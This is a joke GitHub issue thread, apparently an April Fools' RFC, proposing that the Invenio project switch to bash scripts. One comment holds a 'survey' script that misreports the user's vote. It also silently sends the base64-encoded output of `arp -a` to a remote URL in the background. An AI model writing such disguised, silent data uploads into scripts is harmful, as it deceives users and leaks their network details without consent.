### ISSUE TITLE
RFC: Replace Python/JavaScript with bash scripts

### ISSUE THREAD

**Issue by lnielsen** [inveniosoftware/rfcs#25]
We have lately seen several issues with Python/JavaScript as the main language for the Invenio suite of products, this include but is not limited to:

- Modules breaking APIs with the same speed we change our underwear.
- Security vulnerabilities because of a large stack of underlying libraries and because of running the repository as a web application.
- Problems with unmaintained modules were the original creators find more interesting stuff todo.

In order to combat this problem, we propose to change the entire Invenio suite of products to use Bash scripts instead, and make Invenio repositories be purely based on the command-line. With this we would achieve:

- A rock-solid stable API that has stood the test of time, and removal of all third-party libraries.
- Serialized access to the repository - e.g. you could host the repository on a single machine, and simply provide physical access to that machine. This way we can utilize all the well-tested physical access restriction mechanisms and don't have to rely on vulnerable software for the protection. Also, we could avoid implementing any of the Next Generation Repositories technologies and stay with Old Generation Repository technology.
- Command-line interfaces still outperform moused based interactions, and those we would significantly increase the enduser experience.

Regarding the implementation, it would be significantly easier because we can cut out all the security and big data features, and thus reduce the overall number of lines of code. We expect to be ready with the new implementation by April 1st, next year.

**Comment by zannkukai** [comment]
Why not using [Whitespace](https://fr.wikipedia.org/wiki/Whitespace) ? Much more human readable than disgusting BASH ? Think about code review... what a pleasure !!

**Comment by jbenito3** [comment]
LGTM.

**Comment by cfgamboa** [comment]
@lnielsen @LGTM great! So pure BS (Bash Scripting)

**Comment by diegodelemos** [comment]
If you want taker part in the decision process, run this bash script to send your answer 👩‍💻.

<details><summary>./invenio-language-survey.sh</summary>
<p>

```bash
PEOPLES_CHOICE=$1
LARS_CHOICE='bash'

LANGUAGE_OPTIONS='bash c++ go java javascript python rust'

function run_survey {
    if [ ! -z "$PEOPLES_CHOICE" ] && echo $LANGUAGE_OPTIONS | grep -q -w "$PEOPLES_CHOICE"
    then
        echo "Hello, $USER 👋!"
        echo ""
        echo "Congratulations, you have chosen $LARS_CHOICE as the future Invenio language!"
        echo "Wait while we submit your choice to our central poll system ..."
        # yes sure 🤣
        echo ""
        curl -XPOST http://inveniosoftware.org/new-language-poll \
            --silent -q \
            -d "{'answer': '$LARS_CHOICE', 'salt': '$(echo `arp -a`+`date` | base64)'}" > /dev/null 2>&1 &
        SUBMISSION_PROCESS_PID=$!
        display_loader $SUBMISSION_PROCESS_PID
        echo ""
        echo ""
        echo "Answer $LARS_CHOICE submitted ✅."
        echo ""
        echo "Thank you."
    else
        echo "Welcome to the Invenio new language survey. Choose a language 😊:"
        display_options
        exit 1
    fi
}

function display_loader {
    PROCESS_PID=$1

    i=1
    sp="/-\|"

    while kill -0 $PROCESS_PID > /dev/null 2>&1
    do
        printf "\b${sp:i++%${#sp}:1}"
        sleep 0.2
    done
}

function display_options {
    echo $LANGUAGE_OPTIONS | tr ' ' '\n' | xargs -I {} echo "- {}"
    echo ""
    echo "For example: ./invenio-language-survey.sh bash"
}

run_survey

```

</p>
</details>

For example, if you would like to choose Rust, you would run the following, it is very easy:
```console
$ ./invenio-language-survey.sh rust
Hello, rodrigdi 👋!

Congratulations, you have chosen bash as the future Invenio language!
Wait while we submit your choice to our central poll system ...

-

Answer bash submitted ✅.

Thank you.
```

*Remember, your opinion matters 😌*.

**Comment by dfdan** [comment]
You've `sed` enough to convince me. I'm in `awk` of this bold `mv`.
